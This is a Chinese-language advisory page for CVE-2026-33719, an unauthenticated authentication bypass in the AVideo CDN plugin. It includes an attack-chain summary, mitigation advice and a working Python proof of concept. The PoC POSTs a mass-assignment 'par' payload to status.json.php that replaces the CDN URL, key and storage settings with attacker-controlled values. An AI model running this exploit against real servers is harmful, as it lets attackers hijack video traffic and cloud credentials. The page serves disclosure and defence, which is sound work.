CVE-2026-33719 CVSS 8.6 高危

CVE-2026-33719 AVideo CDN插件认证绕过漏洞

披露日期: 2026-03-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33719

漏洞类型

认证绕过

CVSS评分

8.6 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WWBN AVideo

漏洞概述

WWBN AVideo 26.0及以下版本CDN插件存在严重安全缺陷。由于默认认证密钥为空，未配置密钥时验证机制失效。未授权攻击者可利用此漏洞通过`par`参数修改CDN配置、存储凭证及密钥，完全接管CDN服务。

技术细节

该漏洞源于AVideo CDN插件中`status.json.php`和`disable.json.php`端点的逻辑缺陷。插件采用基于密钥的认证，但默认密钥被设置为空字符串。当插件处于启用状态但未手动配置密钥时，系统校验逻辑被绕过。攻击者无需任何身份认证，即可向端点发送特制HTTP请求。通过利用`par`请求参数进行批量赋值，攻击者能够篡改CDN的核心配置项，包括但不限于CDN URL、云存储凭证及认证密钥本身，从而实现服务劫持或进一步的数据窃取。

攻击链分析

STEP 1

侦察

攻击者识别出运行WWBN AVideo 26.0或更低版本的目标，并确认CDN插件已启用且处于默认配置。

STEP 2

漏洞利用

攻击者向`plugin/CDN/status.json.php`或`disable.json.php`发送包含恶意`par`参数的POST请求，利用空密钥默认值绕过认证检查。

STEP 3

配置篡改

通过批量赋值机制，服务器接受攻击者提供的参数，覆盖原有的CDN URL、凭证和认证密钥。

STEP 4

影响达成

攻击者成功接管CDN配置，可能导致视频流量劫持、合法数据窃取或利用存储凭证访问云端资源。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_cve_2026_33719(target_url):
    """
    PoC for CVE-2026-33719: AVideo CDN Plugin Authentication Bypass
    This script attempts to modify the CDN configuration without authentication.
    """
    # The vulnerable endpoint
    endpoint = f"{target_url}/plugin/CDN/status.json.php"
    
    # Malicious configuration to inject via mass assignment
    payload_data = {
        "streamer": "http://attacker-controlled-cdn.com",
        "key": "pwned_by_attacker",
        "storage_url": "s3://evil-bucket"
    }
    
    # The 'par' parameter is used for mass assignment in the vulnerable code
    params = {
        "par": payload_data
    }
    
    try:
        print(f"[*] Sending payload to {endpoint}...")
        response = requests.post(endpoint, data=params, timeout=10)
        
        if response.status_code == 200:
            print("[+] Request sent successfully. Check if configuration was modified.")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Unexpected status code: {response.status_code}")
            
    except Exception as e:
        print(f"[-] Error occurred: {e}")

if __name__ == "__main__":
    target = "http://localhost/avideo" # Replace with actual target
    exploit_cve_2026_33719(target)

影响范围

WWBN AVideo <= 26.0

防御指南

临时缓解措施

建议立即升级至修复版本。若无法立即升级，应检查并确保CDN插件已设置了复杂的自定义密钥，或者暂时禁用CDN插件，并通过WAF或防火墙规则阻断对相关API端点的非授权访问。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表